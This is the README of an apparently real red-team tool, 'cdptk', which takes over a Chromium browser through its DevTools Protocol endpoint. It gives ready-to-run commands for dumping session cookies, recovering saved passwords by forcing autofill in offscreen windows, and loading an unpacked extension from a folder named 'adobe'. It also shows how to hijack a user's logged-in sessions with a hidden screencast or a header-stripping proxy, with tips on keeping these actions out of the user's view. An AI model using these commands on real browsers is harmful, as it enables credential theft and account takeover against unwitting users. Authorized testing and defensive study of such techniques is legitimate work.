cdptk is a Python command-line tool for working with chromium browsers through the Chrome DevTools Protocol (CDP). It is built for penetration testing and red team workflows where you have access to a running browser's CDP endpoint and want to inspect browser state, collect artifacts, or browse through the user's browser context.
From the CDP-Toolkit folder:
pip install -e .
cdptk --helpcdptk discover --cdp-endpoint http://127.0.0.1:9222
cdptk tabs list --cdp-endpoint http://127.0.0.1:9222
cdptk tabs screenshot 1 --cdp-endpoint http://127.0.0.1:9222 --out tab-1.png
cdptk cookies dump --cdp-endpoint http://127.0.0.1:9222 --out cookies.json
cdptk bookmarks list --cdp-endpoint http://127.0.0.1:9222 --out bookmarks.json
cdptk history search azure --cdp-endpoint http://127.0.0.1:9222 --limit 50
cdptk saved-passwords list --cdp-endpoint http://127.0.0.1:9222
cdptk extensions list --cdp-endpoint http://127.0.0.1:9222
cdptk extensions load "C:\Users\defaultuser\Desktop\adobe" --cdp-endpoint http://127.0.0.1:9222Shows basic information about the browser behind the CDP endpoint. It queries /json/version and /json/list, then reports the browser product, protocol version, user agent, WebSocket debugger URL, and visible HTTP targets.
Use it first to confirm that the endpoint is reachable and that you are talking to the expected browser.
cdptk discover --cdp-endpoint http://127.0.0.1:9222Lists open browser page targets as stable, 1-based tab indexes for the current command invocation. Each row includes a short target ID prefix, title, URL, and browser context when available.
Use this before tab-scoped actions such as screenshots. The indexes are generated from the current CDP target list, so rerun tabs list if tabs are opened or closed.
cdptk tabs list --cdp-endpoint http://127.0.0.1:9222Captures a screenshot of a specific tab. The tab can be selected by the index from tabs list, a target ID prefix, or unique text from the tab title or URL.
This attaches to the tab through CDP and uses Page.captureScreenshot. With --full, it attempts a full-page capture instead of only the current viewport.
cdptk tabs screenshot 1 --cdp-endpoint http://127.0.0.1:9222 --out tab-1.png
cdptk tabs screenshot portal.azure.com --cdp-endpoint http://127.0.0.1:9222 --full --out portal.pngDumps browser cookies through CDP using Storage.getCookies. It can filter by domain, redact values for safer review, and write JSON to disk.
This command asks the browser for cookies; it does not read cookie database files from the profile.
cdptk cookies dump --cdp-endpoint http://127.0.0.1:9222 --out cookies.json
cdptk cookies dump --cdp-endpoint http://127.0.0.1:9222 --domain microsoftonline.com Collects bookmarks or favorites through browser-rendered WebUI. The command opens the browser's bookmarks/favorites UI through CDP, prefers the browser's WebUI bookmark model when available, and falls back to rendered DOM extraction when needed.
It returns flattened bookmark rows by default, including title, URL, folder path, IDs, and timestamps when available. Use --tree for the raw browser bookmark tree.
cdptk bookmarks list --cdp-endpoint http://127.0.0.1:9222 --out bookmarks.json
cdptk bookmarks list azure --cdp-endpoint http://127.0.0.1:9222 --domain microsoft.comSearches browser history through the rendered chrome://history or edge://history WebUI. The command opens a temporary history target, inspects the WebUI model or rendered page, scrolls/loads entries as needed, and closes the temporary target after collection.
Use this to answer questions like "what sites has this browser visited" without touching the profile's History SQLite file.
cdptk history search azure --cdp-endpoint http://127.0.0.1:9222 --limit 50
cdptk history search --cdp-endpoint http://127.0.0.1:9222 --domain login.microsoftonline.comLists saved-password site metadata through the browser's password manager WebUI. It returns site groups, usernames, entry IDs, affiliated domains, passkey indicators, and storage hints when the browser exposes them.
This command inventories saved-password metadata. It does not decrypt passwords directly and does not read the Login Data database.
Warning
saved-passwords list opens the browser password-manager/settings WebUI through CDP. Edge only populates saved-password rows in a visible target in current testing, so Edge is restricted to --mode visible. Chrome works with --mode visible, --mode background, and --mode hidden.
cdptk saved-passwords list --cdp-endpoint http://127.0.0.1:9222 --out saved-password-sites.jsonAttempts an autofill-backed password recovery workflow against a real origin. The command creates a real browser window, optionally parks it offscreen, enables focus emulation, uses either the page's login form or an injected controlled form, triggers browser password autofill with CDP input events, and reads the resulting field values through CDP.
Start with the real saved login URL and --no-inject-form. The saved-password realm and login URL have to match closely. Prefer the exact URL Chrome shows for the saved site, such as http://test.local/; a different path, host, or port can prevent the popup from offering the credential even when a similar page is served. --inject-form is still useful when the page markup fights autofill, but current testing shows the real page is the better first attempt.
The popup selection path is deliberately simple: click a credential field, wait for Chromium's saved-password popup, send ArrowDown and Enter through CDP keyboard events, then read the field values. It tries the username field first, then the password field if needed. The popup is browser UI, so the tool avoids coordinate-clicking the black popup row. Tune --popup-open-ms if a slow site needs more time before the keyboard selection.
Warning
saved-passwords dump defaults to --mode visible because Chromium's browser-side password popup is native browser UI. --mode offscreen parks the window at negative coordinates; Edge handled that in testing, but Chrome may fail if its saved-password popup cannot anchor to the offscreen native window.
By default, the command prints a compact JSON result with the recovered values and the attempt that worked. Use --full when you need the diagnostic window bounds, field geometry, and per-attempt details.
cdptk saved-passwords dump http://test.local/ --cdp-endpoint http://127.0.0.1:9222 --no-inject-form --out autofill.json
cdptk saved-passwords dump https://example.com/login --cdp-endpoint http://127.0.0.1:9222 --mode visible --popup-open-ms 1200 --out autofill.json
cdptk saved-passwords dump https://example.com/login --cdp-endpoint http://127.0.0.1:9222 --full --out autofill-debug.json
cdptk saved-passwords dump https://example.com --cdp-endpoint http://127.0.0.1:9222 --no-inject-form --username-selector "#user" --password-selector "#pass"Inventories installed extensions through chrome://extensions or edge://extensions WebUI. It opens a temporary WebUI target, extracts extension rows from the browser's rendered extension manager, and closes the target.
The output can include names, extension IDs, enabled state, descriptions, views/options pages, and related metadata depending on what the WebUI exposes.
cdptk extensions list --cdp-endpoint http://127.0.0.1:9222 --out extensions.jsonLoads an unpacked extension directory through the browser-target CDP command Extensions.loadUnpacked. The CDP endpoint must already be open, and the path must be an absolute directory path as seen by the browser host.
By default the command sends enableInIncognito=false, matching Chromium's normal unpacked-loader behavior. Add --enable-incognito to request incognito access, and --local-check when the browser host is the same machine and you want the toolkit to verify the directory exists before sending the CDP command.
cdptk extensions load "C:\Users\defaultuser\Desktop\adobe" --cdp-endpoint http://127.0.0.1:9222
cdptk extensions load "C:\Users\defaultuser\Desktop\adobe" --cdp-endpoint http://127.0.0.1:9222 --out loaded-extension.jsonCreates a new browser target through CDP. It can open a visible tab, background tab, hidden target, or an isolated browser context.
Use --hold for hidden targets or temporary contexts that should stay alive after creation. Without --hold, hidden targets can disappear when the CDP session closes.
cdptk page new https://example.com --cdp-endpoint http://127.0.0.1:9222 --mode visible
cdptk page new https://example.com --cdp-endpoint http://127.0.0.1:9222 --mode hidden --holdCaptures a structured page snapshot from an existing target. --kind ax captures an accessibility tree with Accessibility.getFullAXTree; --kind dom captures a DOM snapshot with DOMSnapshot.captureSnapshot.
Use accessibility snapshots for quick semantic inspection and DOM snapshots for lower-level page structure.
cdptk page snapshot <target-prefix> --cdp-endpoint http://127.0.0.1:9222 --kind ax --out page.ax.json
cdptk page snapshot <target-prefix> --cdp-endpoint http://127.0.0.1:9222 --kind dom --out page.dom.jsonCloses a target by full target ID or unique prefix. This is the cleanup command for targets you created with page new, browser-takeover screencast, or manual CDP work.
cdptk page close <target-prefix> --cdp-endpoint http://127.0.0.1:9222Lists non-default browser contexts. These are isolated contexts created through CDP, often for proxied browsing or contained sessions.
The default browser context is not listed because Chrome/Edge does not expose it as a normal disposable context.
cdptk contexts list --cdp-endpoint http://127.0.0.1:9222Disposes a non-default browser context and closes its targets. Use this to clean up isolated/proxied contexts created with page new --mode isolated or browser-takeover screencast --browser-socks.
cdptk contexts dispose <browserContextId> --cdp-endpoint http://127.0.0.1:9222Starts a local operator web console that controls a CDP browser target through screencast frames and input events. The target browser renders the page; the operator sees a streamed view and sends clicks, keyboard input, paste, navigation, reload, back/forward, and close actions through CDP.
This is the highest-fidelity interactive browsing mode because Chrome/Edge remains the real browser running the site. It keeps browser-held cookies, storage, enterprise auth state, WebAuthn behavior, extensions, and browser-specific JavaScript behavior inside the browser that already owns that state. This is especially helpful when targeting complex web apps that do not play well with browser-takeover proxy.
Warning
browser-takeover screencast creates a real Chrome/Edge target on the CDP host. Depending on the selected mode and current browser/window state, the new tab, window, or web page may be visible to the user.
cdptk browser-takeover screencast `
--cdp-endpoint http://127.0.0.1:9222 `
--listen 127.0.0.1:8093 `
--start-url https://portal.azure.com `
--mode offscreenThen browse locally to:
http://127.0.0.1:8093
Modes:
| Mode | What it does |
|---|---|
offscreen |
Creates a dedicated window and moves it off-screen before screencasting it. |
background |
Creates a background tab in the current browser window. |
Starts a local HTTP/HTTPS proxy on the operator machine. The operator points a local browser or HTTP client at this proxy, and upstream requests are fetched through hidden victim-Chrome tabs using CDP.
For HTTPS, the toolkit generates a local CA and per-host leaf certificates. Import runs/proxy/certs/ca.crt into the operator browser if you want HTTPS sites to render without certificate errors.
cdptk browser-takeover proxy `
--cdp-endpoint http://127.0.0.1:9222 `
--listen 127.0.0.1:8080 `
--cert-dir runs/proxy/certs `
--mode hidden `
--resource-strategy safe `
--download-policy deny `
-vConfigure the operator browser proxy:
HTTP proxy: 127.0.0.1:8080
HTTPS proxy: 127.0.0.1:8080
What the proxy does:
- Accepts plaintext HTTP proxy requests and HTTPS
CONNECT. - Uses victim Chrome to perform upstream document requests.
- Preserves victim Chrome cookies and user agent where CDP exposes them.
- Strips blocking CSP/CORS/framing headers to improve operator-side renderability.
--mode hiddenuses hidden CDP fetch targets when supported. Use--mode backgroundwhen hidden targets are unsupported or you want visible browser tabs for troubleshooting.--resource-strategy safeusesNetwork.loadNetworkResourcefor GET/HEAD subresources such as fonts, scripts, styles, images, and download-prone extensions so those bytes stream back to the operator instead of causing victim-side downloads. Use--resource-strategy navigateto force the older navigate-everything behavior.--download-policy denyasks each CDP fetch target to deny browser downloads while proxying. Use--download-policy allowwhen you intentionally want browser-managed downloads.- Retries top-level GET/HEAD attachment navigations that abort with
net::ERR_ABORTEDusing a same-originRuntime.evaluate(fetch(..., credentials: "include"))fallback so the operator browser can receive the file.
Proxy mode is useful for targeted request/response workflows and for browsing from the victim browser's network position. It is less faithful than screencast mode for complex portals because the operator browser renders and executes JavaScript locally while victim Chrome performs upstream fetches.
Use page close for individual targets and contexts dispose for isolated browser contexts. Temporary WebUI targets created by collectors are intended to close automatically.
cdptk page close <target-prefix> --cdp-endpoint http://127.0.0.1:9222
cdptk contexts dispose <browserContextId> --cdp-endpoint http://127.0.0.1:9222Tool is built on the information presented during Modern Session Hijacking by Living off the DevTools Protocol by Cedric Van Bockhaven